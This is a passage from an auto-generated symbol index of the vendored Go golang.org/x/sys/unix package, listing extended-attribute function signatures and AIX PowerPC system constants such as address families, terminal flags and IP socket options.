er... function Removexattr (line 136) | func Removexattr(file string, attr string) (err error) { function Fremovexattr (line 146) | func Fremovexattr(fd int, attr string) (err error) { function Lremovexattr (line 156) | func Lremovexattr(link string, attr string) (err error) { function Listxattr (line 166) | func Listxattr(file string, dest []byte) (sz int, err error) { function ListxattrNS (line 198) | func ListxattrNS(file string, nsid int, dest []byte) (sz int, err error) { function Flistxattr (line 210) | func Flistxattr(fd int, dest []byte) (sz int, err error) { function FlistxattrNS (line 234) | func FlistxattrNS(fd int, nsid int, dest []byte) (sz int, err error) { function Llistxattr (line 246) | func Llistxattr(link string, dest []byte) (sz int, err error) { function LlistxattrNS (line 270) | func LlistxattrNS(link string, nsid int, dest []byte) (sz int, err error) { FILE: vendor/golang.org/x/sys/unix/zerrors_aix_ppc.go constant AF_APPLETALK (line 14) | AF_APPLETALK = 0x10 constant AF_BYPASS (line 15) | AF_BYPASS = 0x19 constant AF_CCITT (line 16) | AF_CCITT = 0xa constant AF_CHAOS (line 17) | AF_CHAOS = 0x5 constant AF_DATAKIT (line 18) | AF_DATAKIT = 0x9 constant AF_DECnet (line 19) | AF_DECnet = 0xc constant AF_DLI (line 20) | AF_DLI = 0xd constant AF_ECMA (line 21) | AF_ECMA = 0x8 constant AF_HYLINK (line 22) | AF_HYLINK = 0xf constant AF_IMPLINK (line 23) | AF_IMPLINK = 0x3 constant AF_INET (line 24) | AF_INET = 0x2 constant AF_INET6 (line 25) | AF_INET6 = 0x18 constant AF_INTF (line 26) | AF_INTF = 0x14 constant AF_ISO (line 27) | AF_ISO = 0x7 constant AF_LAT (line 28) | AF_LAT = 0xe constant AF_LINK (line 29) | AF_LINK = 0x12 constant AF_LOCAL (line 30) | AF_LOCAL = 0x1 constant AF_MAX (line 31) | AF_MAX = 0x1e constant AF_NDD (line 32) | AF_NDD = 0x17 constant AF_NETWARE (line 33) | AF_NETWARE = 0x16 constant AF_NS (line 34) | AF_NS = 0x6 constant AF_OSI (line 35) | AF_OSI = 0x7 constant AF_PUP (line 36) | AF_PUP = 0x4 constant AF_RIF (line 37) | AF_RIF = 0x15 constant AF_ROUTE (line 38) | AF_ROUTE = 0x11 constant AF_SNA (line 39) | AF_SNA = 0xb constant AF_UNIX (line 40) | AF_UNIX = 0x1 constant AF_UNSPEC (line 41) | AF_UNSPEC = 0x0 constant ALTWERASE (line 42) | ALTWERASE = 0x400000 constant ARPHRD_802_3 (line 43) | ARPHRD_802_3 = 0x6 constant ARPHRD_802_5 (line 44) | ARPHRD_802_5 = 0x6 constant ARPHRD_ETHER (line 45) | ARPHRD_ETHER = 0x1 constant ARPHRD_FDDI (line 46) | ARPHRD_FDDI = 0x1 constant B0 (line 47) | B0 = 0x0 constant B110 (line 48) | B110 = 0x3 constant B1200 (line 49) | B1200 = 0x9 constant B134 (line 50) | B134 = 0x4 constant B150 (line 51) | B150 = 0x5 constant B1800 (line 52) | B1800 = 0xa constant B19200 (line 53) | B19200 = 0xe constant B200 (line 54) | B200 = 0x6 constant B2400 (line 55) | B2400 = 0xb constant B300 (line 56) | B300 = 0x7 constant B38400 (line 57) | B38400 = 0xf constant B4800 (line 58) | B4800 = 0xc constant B50 (line 59) | B50 = 0x1 constant B600 (line 60) | B600 = 0x8 constant B75 (line 61) | B75 = 0x2 constant B9600 (line 62) | B9600 = 0xd constant BRKINT (line 63) | BRKINT = 0x2 constant BS0 (line 64) | BS0 = 0x0 constant BS1 (line 65) | BS1 = 0x1000 constant BSDLY (line 66) | BSDLY = 0x1000 constant CAP_AACCT (line 67) | CAP_AACCT = 0x6 constant CAP_ARM_APPLICATION (line 68) | CAP_ARM_APPLICATION = 0x5 constant CAP_BYPASS_RAC_VMM (line 69) | CAP_BYPASS_RAC_VMM = 0x3 constant CAP_CLEAR (line 70) | CAP_CLEAR = 0x0 constant CAP_CREDENTIALS (line 71) | CAP_CREDENTIALS = 0x7 constant CAP_EFFECTIVE (line 72) | CAP_EFFECTIVE = 0x1 constant CAP_EWLM_AGENT (line 73) | CAP_EWLM_AGENT = 0x4 constant CAP_INHERITABLE (line 74) | CAP_INHERITABLE = 0x2 constant CAP_MAXIMUM (line 75) | CAP_MAXIMUM = 0x7 constant CAP_NUMA_ATTACH (line 76) | CAP_NUMA_ATTACH = 0x2 constant CAP_PERMITTED (line 77) | CAP_PERMITTED = 0x3 constant CAP_PROPAGATE (line 78) | CAP_PROPAGATE = 0x1 constant CAP_PROPOGATE (line 79) | CAP_PROPOGATE = 0x1 constant CAP_SET (line 80) | CAP_SET = 0x1 constant CBAUD (line 81) | CBAUD = 0xf constant CFLUSH (line 82) | CFLUSH = 0xf constant CIBAUD (line 83) | CIBAUD = 0xf0000 constant CLOCAL (line 84) | CLOCAL = 0x800 constant CLOCK_MONOTONIC (line 85) | CLOCK_MONOTONIC = 0xa constant CLOCK_PROCESS_CPUTIME_ID (line 86) | CLOCK_PROCESS_CPUTIME_ID = 0xb constant CLOCK_REALTIME (line 87) | CLOCK_REALTIME = 0x9 constant CLOCK_THREAD_CPUTIME_ID (line 88) | CLOCK_THREAD_CPUTIME_ID = 0xc constant CR0 (line 89) | CR0 = 0x0 constant CR1 (line 90) | CR1 = 0x100 constant CR2 (line 91) | CR2 = 0x200 constant CR3 (line 92) | CR3 = 0x300 constant CRDLY (line 93) | CRDLY = 0x300 constant CREAD (line 94) | CREAD = 0x80 constant CS5 (line 95) | CS5 = 0x0 constant CS6 (line 96) | CS6 = 0x10 constant CS7 (line 97) | CS7 = 0x20 constant CS8 (line 98) | CS8 = 0x30 constant CSIOCGIFCONF (line 99) | CSIOCGIFCONF = -0x3ff796dc constant CSIZE (line 100) | CSIZE = 0x30 constant CSMAP_DIR (line 101) | CSMAP_DIR = "/usr/lib/nls/csmap/" constant CSTART (line 102) | CSTART = '\021' constant CSTOP (line 103) | CSTOP = '\023' constant CSTOPB (line 104) | CSTOPB = 0x40 constant CSUSP (line 105) | CSUSP = 0x1a constant ECHO (line 106) | ECHO = 0x8 constant ECHOCTL (line 107) | ECHOCTL = 0x20000 constant ECHOE (line 108) | ECHOE = 0x10 constant ECHOK (line 109) | ECHOK = 0x20 constant ECHOKE (line 110) | ECHOKE = 0x80000 constant ECHONL (line 111) | ECHONL = 0x40 constant ECHOPRT (line 112) | ECHOPRT = 0x40000 constant ECH_ICMPID (line 113) | ECH_ICMPID = 0x2 constant ETHERNET_CSMACD (line 114) | ETHERNET_CSMACD = 0x6 constant EVENP (line 115) | EVENP = 0x80 constant EXCONTINUE (line 116) | EXCONTINUE = 0x0 constant EXDLOK (line 117) | EXDLOK = 0x3 constant EXIO (line 118) | EXIO = 0x2 constant EXPGIO (line 119) | EXPGIO = 0x0 constant EXRESUME (line 120) | EXRESUME = 0x2 constant EXRETURN (line 121) | EXRETURN = 0x1 constant EXSIG (line 122) | EXSIG = 0x4 constant EXTA (line 123) | EXTA = 0xe constant EXTB (line 124) | EXTB = 0xf constant EXTRAP (line 125) | EXTRAP = 0x1 constant EYEC_RTENTRYA (line 126) | EYEC_RTENTRYA = 0x257274656e747241 constant EYEC_RTENTRYF (line 127) | EYEC_RTENTRYF = 0x257274656e747246 constant E_ACC (line 128) | E_ACC = 0x0 constant FD_CLOEXEC (line 129) | FD_CLOEXEC = 0x1 constant FD_SETSIZE (line 130) | FD_SETSIZE = 0xfffe constant FF0 (line 131) | FF0 = 0x0 constant FF1 (line 132) | FF1 = 0x2000 constant FFDLY (line 133) | FFDLY = 0x2000 constant FLUSHBAND (line 134) | FLUSHBAND = 0x40 constant FLUSHLOW (line 135) | FLUSHLOW = 0x8 constant FLUSHO (line 136) | FLUSHO = 0x100000 constant FLUSHR (line 137) | FLUSHR = 0x1 constant FLUSHRW (line 138) | FLUSHRW = 0x3 constant FLUSHW (line 139) | FLUSHW = 0x2 constant F_CLOSEM (line 140) | F_CLOSEM = 0xa constant F_DUP2FD (line 141) | F_DUP2FD = 0xe constant F_DUPFD (line 142) | F_DUPFD = 0x0 constant F_GETFD (line 143) | F_GETFD = 0x1 constant F_GETFL (line 144) | F_GETFL = 0x3 constant F_GETLK (line 145) | F_GETLK = 0x5 constant F_GETLK64 (line 146) | F_GETLK64 = 0xb constant F_GETOWN (line 147) | F_GETOWN = 0x8 constant F_LOCK (line 148) | F_LOCK = 0x1 constant F_OK (line 149) | F_OK = 0x0 constant F_RDLCK (line 150) | F_RDLCK = 0x1 constant F_SETFD (line 151) | F_SETFD = 0x2 constant F_SETFL (line 152) | F_SETFL = 0x4 constant F_SETLK (line 153) | F_SETLK = 0x6 constant F_SETLK64 (line 154) | F_SETLK64 = 0xc constant F_SETLKW (line 155) | F_SETLKW = 0x7 constant F_SETLKW64 (line 156) | F_SETLKW64 = 0xd constant F_SETOWN (line 157) | F_SETOWN = 0x9 constant F_TEST (line 158) | F_TEST = 0x3 constant F_TLOCK (line 159) | F_TLOCK = 0x2 constant F_TSTLK (line 160) | F_TSTLK = 0xf constant F_ULOCK (line 161) | F_ULOCK = 0x0 constant F_UNLCK (line 162) | F_UNLCK = 0x3 constant F_WRLCK (line 163) | F_WRLCK = 0x2 constant HUPCL (line 164) | HUPCL = 0x400 constant IBSHIFT (line 165) | IBSHIFT = 0x10 constant ICANON (line 166) | ICANON = 0x2 constant ICMP6_FILTER (line 167) | ICMP6_FILTER = 0x26 constant ICMP6_SEC_SEND_DEL (line 168) | ICMP6_SEC_SEND_DEL = 0x46 constant ICMP6_SEC_SEND_GET (line 169) | ICMP6_SEC_SEND_GET = 0x47 constant ICMP6_SEC_SEND_SET (line 170) | ICMP6_SEC_SEND_SET = 0x44 constant ICMP6_SEC_SEND_SET_CGA_ADDR (line 171) | ICMP6_SEC_SEND_SET_CGA_ADDR = 0x45 constant ICRNL (line 172) | ICRNL = 0x100 constant IEXTEN (line 173) | IEXTEN = 0x200000 constant IFA_FIRSTALIAS (line 174) | IFA_FIRSTALIAS = 0x2000 constant IFA_ROUTE (line 175) | IFA_ROUTE = 0x1 constant IFF_64BIT (line 176) | IFF_64BIT = 0x4000000 constant IFF_ALLCAST (line 177) | IFF_ALLCAST = 0x20000 constant IFF_ALLMULTI (line 178) | IFF_ALLMULTI = 0x200 constant IFF_BPF (line 179) | IFF_BPF = 0x8000000 constant IFF_BRIDGE (line 180) | IFF_BRIDGE = 0x40000 constant IFF_BROADCAST (line 181) | IFF_BROADCAST = 0x2 constant IFF_CANTCHANGE (line 182) | IFF_CANTCHANGE = 0x80c52 constant IFF_CHECKSUM_OFFLOAD (line 183) | IFF_CHECKSUM_OFFLOAD = 0x10000000 constant IFF_D1 (line 184) | IFF_D1 = 0x8000 constant IFF_D2 (line 185) | IFF_D2 = 0x4000 constant IFF_D3 (line 186) | IFF_D3 = 0x2000 constant IFF_D4 (line 187) | IFF_D4 = 0x1000 constant IFF_DEBUG (line 188) | IFF_DEBUG = 0x4 constant IFF_DEVHEALTH (line 189) | IFF_DEVHEALTH = 0x4000 constant IFF_DO_HW_LOOPBACK (line 190) | IFF_DO_HW_LOOPBACK = 0x10000 constant IFF_GROUP_ROUTING (line 191) | IFF_GROUP_ROUTING = 0x2000000 constant IFF_IFBUFMGT (line 192) | IFF_IFBUFMGT = 0x800000 constant IFF_LINK0 (line 193) | IFF_LINK0 = 0x100000 constant IFF_LINK1 (line 194) | IFF_LINK1 = 0x200000 constant IFF_LINK2 (line 195) | IFF_LINK2 = 0x400000 constant IFF_LOOPBACK (line 196) | IFF_LOOPBACK = 0x8 constant IFF_MULTICAST (line 197) | IFF_MULTICAST = 0x80000 constant IFF_NOARP (line 198) | IFF_NOARP = 0x80 constant IFF_NOECHO (line 199) | IFF_NOECHO = 0x800 constant IFF_NOTRAILERS (line 200) | IFF_NOTRAILERS = 0x20 constant IFF_OACTIVE (line 201) | IFF_OACTIVE = 0x400 constant IFF_POINTOPOINT (line 202) | IFF_POINTOPOINT = 0x10 constant IFF_PROMISC (line 203) | IFF_PROMISC = 0x100 constant IFF_PSEG (line 204) | IFF_PSEG = 0x40000000 constant IFF_RUNNING (line 205) | IFF_RUNNING = 0x40 constant IFF_SIMPLEX (line 206) | IFF_SIMPLEX = 0x800 constant IFF_SNAP (line 207) | IFF_SNAP = 0x8000 constant IFF_TCP_DISABLE_CKSUM (line 208) | IFF_TCP_DISABLE_CKSUM = 0x20000000 constant IFF_TCP_NOCKSUM (line 209) | IFF_TCP_NOCKSUM = 0x1000000 constant IFF_UP (line 210) | IFF_UP = 0x1 constant IFF_VIPA (line 211) | IFF_VIPA = 0x80000000 constant IFNAMSIZ (line 212) | IFNAMSIZ = 0x10 constant IFO_FLUSH (line 213) | IFO_FLUSH = 0x1 constant IFT_1822 (line 214) | IFT_1822 = 0x2 constant IFT_AAL5 (line 215) | IFT_AAL5 = 0x31 constant IFT_ARCNET (line 216) | IFT_ARCNET = 0x23 constant IFT_ARCNETPLUS (line 217) | IFT_ARCNETPLUS = 0x24 constant IFT_ATM (line 218) | IFT_ATM = 0x25 constant IFT_CEPT (line 219) | IFT_CEPT = 0x13 constant IFT_CLUSTER (line 220) | IFT_CLUSTER = 0x3e constant IFT_DS3 (line 221) | IFT_DS3 = 0x1e constant IFT_EON (line 222) | IFT_EON = 0x19 constant IFT_ETHER (line 223) | IFT_ETHER = 0x6 constant IFT_FCS (line 224) | IFT_FCS = 0x3a constant IFT_FDDI (line 225) | IFT_FDDI = 0xf constant IFT_FRELAY (line 226) | IFT_FRELAY = 0x20 constant IFT_FRELAYDCE (line 227) | IFT_FRELAYDCE = 0x2c constant IFT_GIFTUNNEL (line 228) | IFT_GIFTUNNEL = 0x3c constant IFT_HDH1822 (line 229) | IFT_HDH1822 = 0x3 constant IFT_HF (line 230) | IFT_HF = 0x3d constant IFT_HIPPI (line 231) | IFT_HIPPI = 0x2f constant IFT_HSSI (line 232) | IFT_HSSI = 0x2e constant IFT_HY (line 233) | IFT_HY = 0xe constant IFT_IB (line 234) | IFT_IB = 0xc7 constant IFT_ISDNBASIC (line 235) | IFT_ISDNBASIC = 0x14 constant IFT_ISDNPRIMARY (line 236) | IFT_ISDNPRIMARY = 0x15 constant IFT_ISO88022LLC (line 237) | IFT_ISO88022LLC = 0x29 constant IFT_ISO88023 (line 238) | IFT_ISO88023 = 0x7 constant IFT_ISO88024 (line 239) | IFT_ISO88024 = 0x8 constant IFT_ISO88025 (line 240) | IFT_ISO88025 = 0x9 constant IFT_ISO88026 (line 241) | IFT_ISO88026 = 0xa constant IFT_LAPB (line 242) | IFT_LAPB = 0x10 constant IFT_LOCALTALK (line 243) | IFT_LOCALTALK = 0x2a constant IFT_LOOP (line 244) | IFT_LOOP = 0x18 constant IFT_MIOX25 (line 245) | IFT_MIOX25 = 0x26 constant IFT_MODEM (line 246) | IFT_MODEM = 0x30 constant IFT_NSIP (line 247) | IFT_NSIP = 0x1b constant IFT_OTHER (line 248) | IFT_OTHER = 0x1 constant IFT_P10 (line 249) | IFT_P10 = 0xc constant IFT_P80 (line 250) | IFT_P80 = 0xd constant IFT_PARA (line 251) | IFT_PARA = 0x22 constant IFT_PPP (line 252) | IFT_PPP = 0x17 constant IFT_PROPMUX (line 253) | IFT_PROPMUX = 0x36 constant IFT_PROPVIRTUAL (line 254) | IFT_PROPVIRTUAL = 0x35 constant IFT_PTPSERIAL (line 255) | IFT_PTPSERIAL = 0x16 constant IFT_RS232 (line 256) | IFT_RS232 = 0x21 constant IFT_SDLC (line 257) | IFT_SDLC = 0x11 constant IFT_SIP (line 258) | IFT_SIP = 0x1f constant IFT_SLIP (line 259) | IFT_SLIP = 0x1c constant IFT_SMDSDXI (line 260) | IFT_SMDSDXI = 0x2b constant IFT_SMDSICIP (line 261) | IFT_SMDSICIP = 0x34 constant IFT_SN (line 262) | IFT_SN = 0x38 constant IFT_SONET (line 263) | IFT_SONET = 0x27 constant IFT_SONETPATH (line 264) | IFT_SONETPATH = 0x32 constant IFT_SONETVT (line 265) | IFT_SONETVT = 0x33 constant IFT_SP (line 266) | IFT_SP = 0x39 constant IFT_STARLAN (line 267) | IFT_STARLAN = 0xb constant IFT_T1 (line 268) | IFT_T1 = 0x12 constant IFT_TUNNEL (line 269) | IFT_TUNNEL = 0x3b constant IFT_ULTRA (line 270) | IFT_ULTRA = 0x1d constant IFT_V35 (line 271) | IFT_V35 = 0x2d constant IFT_VIPA (line 272) | IFT_VIPA = 0x37 constant IFT_X25 (line 273) | IFT_X25 = 0x5 constant IFT_X25DDN (line 274) | IFT_X25DDN = 0x4 constant IFT_X25PLE (line 275) | IFT_X25PLE = 0x28 constant IFT_XETHER (line 276) | IFT_XETHER = 0x1a constant IGNBRK (line 277) | IGNBRK = 0x1 constant IGNCR (line 278) | IGNCR = 0x80 constant IGNPAR (line 279) | IGNPAR = 0x4 constant IMAXBEL (line 280) | IMAXBEL = 0x10000 constant INLCR (line 281) | INLCR = 0x40 constant INPCK (line 282) | INPCK = 0x10 constant IN_CLASSA_HOST (line 283) | IN_CLASSA_HOST = 0xffffff constant IN_CLASSA_MAX (line 284) | IN_CLASSA_MAX = 0x80 constant IN_CLASSA_NET (line 285) | IN_CLASSA_NET = 0xff000000 constant IN_CLASSA_NSHIFT (line 286) | IN_CLASSA_NSHIFT = 0x18 constant IN_CLASSB_HOST (line 287) | IN_CLASSB_HOST = 0xffff constant IN_CLASSB_MAX (line 288) | IN_CLASSB_MAX = 0x10000 constant IN_CLASSB_NET (line 289) | IN_CLASSB_NET = 0xffff0000 constant IN_CLASSB_NSHIFT (line 290) | IN_CLASSB_NSHIFT = 0x10 constant IN_CLASSC_HOST (line 291) | IN_CLASSC_HOST = 0xff constant IN_CLASSC_NET (line 292) | IN_CLASSC_NET = 0xffffff00 constant IN_CLASSC_NSHIFT (line 293) | IN_CLASSC_NSHIFT = 0x8 constant IN_CLASSD_HOST (line 294) | IN_CLASSD_HOST = 0xfffffff constant IN_CLASSD_NET (line 295) | IN_CLASSD_NET = 0xf0000000 constant IN_CLASSD_NSHIFT (line 296) | IN_CLASSD_NSHIFT = 0x1c constant IN_LOOPBACKNET (line 297) | IN_LOOPBACKNET = 0x7f constant IN_USE (line 298) | IN_USE = 0x1 constant IPPROTO_AH (line 299) | IPPROTO_AH = 0x33 constant IPPROTO_BIP (line 300) | IPPROTO_BIP = 0x53 constant IPPROTO_DSTOPTS (line 301) | IPPROTO_DSTOPTS = 0x3c constant IPPROTO_EGP (line 302) | IPPROTO_EGP = 0x8 constant IPPROTO_EON (line 303) | IPPROTO_EON = 0x50 constant IPPROTO_ESP (line 304) | IPPROTO_ESP = 0x32 constant IPPROTO_FRAGMENT (line 305) | IPPROTO_FRAGMENT = 0x2c constant IPPROTO_GGP (line 306) | IPPROTO_GGP = 0x3 constant IPPROTO_GIF (line 307) | IPPROTO_GIF = 0x8c constant IPPROTO_GRE (line 308) | IPPROTO_GRE = 0x2f constant IPPROTO_HOPOPTS (line 309) | IPPROTO_HOPOPTS = 0x0 constant IPPROTO_ICMP (line 310) | IPPROTO_ICMP = 0x1 constant IPPROTO_ICMPV6 (line 311) | IPPROTO_ICMPV6 = 0x3a constant IPPROTO_IDP (line 312) | IPPROTO_IDP = 0x16 constant IPPROTO_IGMP (line 313) | IPPROTO_IGMP = 0x2 constant IPPROTO_IP (line 314) | IPPROTO_IP = 0x0 constant IPPROTO_IPIP (line 315) | IPPROTO_IPIP = 0x4 constant IPPROTO_IPV6 (line 316) | IPPROTO_IPV6 = 0x29 constant IPPROTO_LOCAL (line 317) | IPPROTO_LOCAL = 0x3f constant IPPROTO_MAX (line 318) | IPPROTO_MAX = 0x100 constant IPPROTO_MH (line 319) | IPPROTO_MH = 0x87 constant IPPROTO_NONE (line 320) | IPPROTO_NONE = 0x3b constant IPPROTO_PUP (line 321) | IPPROTO_PUP = 0xc constant IPPROTO_QOS (line 322) | IPPROTO_QOS = 0x2d constant IPPROTO_RAW (line 323) | IPPROTO_RAW = 0xff constant IPPROTO_ROUTING (line 324) | IPPROTO_ROUTING = 0x2b constant IPPROTO_RSVP (line 325) | IPPROTO_RSVP = 0x2e constant IPPROTO_SCTP (line 326) | IPPROTO_SCTP = 0x84 constant IPPROTO_TCP (line 327) | IPPROTO_TCP = 0x6 constant IPPROTO_TP (line 328) | IPPROTO_TP = 0x1d constant IPPROTO_UDP (line 329) | IPPROTO_UDP = 0x11 constant IPV6_ADDRFORM (line 330) | IPV6_ADDRFORM = 0x16 constant IPV6_ADDR_PREFERENCES (line 331) | IPV6_ADDR_PREFERENCES = 0x4a constant IPV6_ADD_MEMBERSHIP (line 332) | IPV6_ADD_MEMBERSHIP = 0xc constant IPV6_AIXRAWSOCKET (line 333) | IPV6_AIXRAWSOCKET = 0x39 constant IPV6_CHECKSUM (line 334) | IPV6_CHECKSUM = 0x27 constant IPV6_DONTFRAG (line 335) | IPV6_DONTFRAG = 0x2d constant IPV6_DROP_MEMBERSHIP (line 336) | IPV6_DROP_MEMBERSHIP = 0xd constant IPV6_DSTOPTS (line 337) | IPV6_DSTOPTS = 0x36 constant IPV6_FLOWINFO_FLOWLABEL (line 338) | IPV6_FLOWINFO_FLOWLABEL = 0xffffff constant IPV6_FLOWINFO_PRIFLOW (line 339) | IPV6_FLOWINFO_PRIFLOW = 0xfffffff constant IPV6_FLOWINFO_PRIORITY (line 340) | IPV6_FLOWINFO_PRIORITY = 0xf000000 constant IPV6_FLOWINFO_SRFLAG (line 341) | IPV6_FLOWINFO_SRFLAG = 0x10000000 constant IPV6_FLOWINFO_VERSION (line 342) | IPV6_FLOWINFO_VERSION = 0xf0000000 constant IPV6_HOPLIMIT (line 343) | IPV6_HOPLIMIT = 0x28 constant IPV6_HOPOPTS (line 344) | IPV6_HOPOPTS = 0x34 constant IPV6_JOIN_GROUP (line 345) | IPV6_JOIN_GROUP = 0xc constant IPV6_LEAVE_GROUP (line 346) | IPV6_LEAVE_GROUP = 0xd constant IPV6_MIPDSTOPTS (line 347) | IPV6_MIPDSTOPTS = 0x36 constant IPV6_MULTICAST_HOPS (line 348) | IPV6_MULTICAST_HOPS = 0xa constant IPV6_MULTICAST_IF (line 349) | IPV6_MULTICAST_IF = 0x9 constant IPV6_MULTICAST_LOOP (line 350) | IPV6_MULTICAST_LOOP = 0xb constant IPV6_NEXTHOP (line 351) | IPV6_NEXTHOP = 0x30 constant IPV6_NOPROBE (line 352) | IPV6_NOPROBE = 0x1c constant IPV6_PATHMTU (line 353) | IPV6_PATHMTU = 0x2e constant IPV6_PKTINFO (line 354) | IPV6_PKTINFO = 0x21 constant IPV6_PKTOPTIONS (line 355) | IPV6_PKTOPTIONS = 0x24 constant IPV6_PRIORITY_10 (line 356) | IPV6_PRIORITY_10 = 0xa000000 constant IPV6_PRIORITY_11 (line 357) | IPV6_PRIORITY_11 = 0xb000000 constant IPV6_PRIORITY_12 (line 358) | IPV6_PRIORITY_12 = 0xc000000 constant IPV6_PRIORITY_13 (line 359) | IPV6_PRIORITY_13 = 0xd000000 constant IPV6_PRIORITY_14 (line 360) | IPV6_PRIORITY_14 = 0xe000000 constant IPV6_PRIORITY_15 (line 361) | IPV6_PRIORITY_15 = 0xf000000 constant IPV6_PRIORITY_8 (line 362) | IPV6_PRIORITY_8 = 0x8000000 constant IPV6_PRIORITY_9 (line 363) | IPV6_PRIORITY_9 = 0x9000000 constant IPV6_PRIORITY_BULK (line 364) | IPV6_PRIORITY_BULK = 0x4000000 constant IPV6_PRIORITY_CONTROL (line 365) | IPV6_PRIORITY_CONTROL = 0x7000000 constant IPV6_PRIORITY_FILLER (line 366) | IPV6_PRIORITY_FILLER = 0x1000000 constant IPV6_PRIORITY_INTERACTIVE (line 367) | IPV6_PRIORITY_INTERACTIVE = 0x6000000 constant IPV6_PRIORITY_RESERVED1 (line 368) | IPV6_PRIORITY_RESERVED1 = 0x3000000 constant IPV6_PRIORITY_RESERVED2 (line 369) | IPV6_PRIORITY_RESERVED2 = 0x5000000 constant IPV6_PRIORITY_UNATTENDED (line 370) | IPV6_PRIORITY_UNATTENDED = 0x2000000 constant IPV6_PRIORITY_UNCHARACTERIZED (line 371) | IPV6_PRIORITY_UNCHARACTERIZED = 0x0 constant IPV6_RECVDSTOPTS (line 372) | IPV6_RECVDSTOPTS = 0x38 constant IPV6_RECVHOPLIMIT (line 373) | IPV6_RECVHOPLIMIT = 0x29 constant IPV6_RECVHOPOPTS (line 374) | IPV6_RECVHOPOPTS = 0x35 constant IPV6_RECVHOPS (line 375) | IPV6_RECVHOPS = 0x22 constant IPV6_RECVIF (line 376) | IPV6_RECVIF = 0x1e constant IPV6_RECVPATHMTU (line 377) | IPV6_RECVPATHMTU = 0x2f constant IPV6_RECVPKTINFO (line 378) | IPV6_RECVPKTINFO = 0x23 constant IPV6_RECVRTHDR (line 379) | IPV6_RECVRTHDR = 0x33 constant IPV6_RECVSRCRT (line 380) | IPV6_RECVSRCRT = 0x1d constant IPV6_RECVTCLASS (line 381) | IPV6_RECVTCLASS = 0x2a constant IPV6_RTHDR (line 382) | IPV6_RTHDR = 0x32 constant IPV6_RTHDRDSTOPTS (line 383) | IPV6_RTHDRDSTOPTS = 0x37 constant IPV6_RTHDR_TYPE_0 (line 384) | IPV6_RTHDR_TYPE_0 = 0x0 constant IPV6_RTHDR_TYPE_2 (line 385) | IPV6_RTHDR_TYPE_2 = 0x2 constant IPV6_SENDIF (line 386) | IPV6_SENDIF = 0x1f constant IPV6_SRFLAG_LOOSE (line 387) | IPV6_SRFLAG_LOOSE = 0x0 constant IPV6_SRFLAG_STRICT (line 388) | IPV6_SRFLAG_STRICT = 0x10000000 constant IPV6_TCLASS (line 389) | IPV6_TCLASS = 0x2b constant IPV6_TOKEN_LENGTH (line 390) | IPV6_TOKEN_LENGTH = 0x40 constant IPV6_UNICAST_HOPS (line 391) | IPV6_UNICAST_HOPS = 0x4 constant IPV6_USE_MIN_MTU (line 392) | IPV6_USE_MIN_MTU = 0x2c constant IPV6_V6ONLY (line 393) | IPV6_V6ONLY = 0x25 constant IPV6_VERSION (line 394) | IPV6_VERSION = 0x60000000 constant IP_ADDRFORM (line 395) | IP_ADDRFORM = 0x16 constant IP_ADD_MEMBERSHIP (line 396) | IP_ADD_MEMBERSHIP = 0xc constant IP_ADD_SOURCE_MEMBERSHIP (line 397) | IP_ADD_SOURCE_MEMBERSHIP = 0x3c constant IP_BLOCK_SOURCE (line 398) | IP_BLOCK_SOURCE = 0x3a constant IP_BROADCAST_IF (line 399) | IP_BROADCAST_IF = 0x10 constant IP_CACHE_LINE_SIZE (line 400) | IP_CACHE_LINE_SIZE = 0x80 constant IP_DEFAULT_MULTICAST_LOOP (line 401) | IP_DEFAULT_MULTICAST_LOOP = 0x1 constant IP_DEFAULT_MULTICAST_TTL (line 402) | IP_DEFAULT_MULTICAST_TTL = 0x1 constant IP_DF (line 403) | IP_DF = 0x4000 constant IP_DHCPMODE (line 404) | IP_DHCPMODE = 0x11 constant IP_DONTFRAG (line 405) | IP_DONTFRAG = 0x19 constant IP_DROP_MEMBERSHIP (line 406) | IP_DROP_MEMBERSHIP = 0xd constant IP_DROP_SOURCE_MEMBERSHIP (line 407) | IP_DROP_SOURCE_MEMBERSHIP = 0x3d constant IP_FINDPMTU (line 408) | IP_FINDPMTU = 0x1a constant IP_HDRINCL (line 409) | IP_HDRINCL = 0x2 constant IP_INC_MEMBERSHIPS (line 410) | IP_INC_MEMBERSHIPS = 0x14 constant IP_INIT_MEMBERSHIP (line 411) | IP_INIT_MEMBERSHIP = 0x14 constant IP_MAXPACKET (line 412) | IP_MAXPACKET = 0xffff constant IP_MF (line 413) | IP_MF = 0x2000 constant IP_MSS (line 414) | IP_MSS = 0x240 constant IP_MULTICAST_HOPS (line 415) | IP_MULTICAST_HOPS = 0xa constant IP_MULTICAST_IF (line 416) | IP_MULTICAST_IF = 0x9 constant IP_MULTICAST_LOOP (line 417) | IP_MULTICAST_LOOP = 0xb constant IP_MULTICAST_TTL (line 418) | IP_MULTICAST_TTL = 0xa constant IP_OPT (line 419) | IP_OPT = 0x1b constant IP_OPTIONS (line 420) | IP_OPTIONS = 0x1 constant IP_PMTUAGE (line 421) | IP_PMTUAGE = 0x1b constant IP_RECVDSTADDR (line 422) | IP_RECVDSTADDR = 0x7 constant IP_RECVIF (line 423) | IP_RECVIF = 0x14 constant IP_RECVIFINFO (line 424) | IP_RECVIFINFO = 0xf constant IP_RECVINTERFACE (line 425) | IP_RECVINTERFACE = 0x20 constant IP_RECVMACHDR (line 426) | IP_RECVMACHDR = 0xe constant IP_RECVOPTS (line 427) | IP_RECVOPTS = 0x5 constant IP_RECVRETOPTS (line 428) | IP_RECVRETOPTS = 0x6 constant IP_RECVTTL (line 429) | IP_RECVTTL = 0x22 constant IP_RETOPTS (line 430) | IP_RETOPTS = 0x8 constant IP_SOURCE_FILTER (line 431) | IP_SOURCE_FILTER = 0x48 constant IP_TOS (line 432) | IP_TOS = 0x3 constant IP_TTL (line 433) | IP_TTL = 0x4 constant IP_UNBLOCK_SOURCE (line 434) | IP_UNBLOCK_SOURCE = 0x3b constant IP_UNICAST_HOPS (line 435) | IP_UNICAST_HOPS = 0x4 constant ISIG (line 436) | ISIG = 0x1 constant ISTRIP (line 437) | ISTRIP = 0x20 constant IUCLC (line 438) | IUCLC = 0x800 constant IXANY (line 439) | IXANY = 0x1000 constant IXOFF (line 440) | IXOFF = 0x400 constant IXON (line 441) | IXON = 0x200 constant I_FLUSH (line 442) | I_FLUSH = 0x20005305 constant LNOFLSH (line 443) | LNOFLSH = 0x8000 constant LOCK_EX (line 444) | LOCK_EX = 0x2 constant LOCK_NB (line 445) | LOCK_NB = 0x4 constant LOCK_SH (line 446) | LOCK_SH = 0x1 constant LOCK_UN (line 447) | LOCK_UN = 0x8 constant MADV_DONTNEED (line 448) | MADV_DONTNEED = 0x4 constant MADV_NORMAL 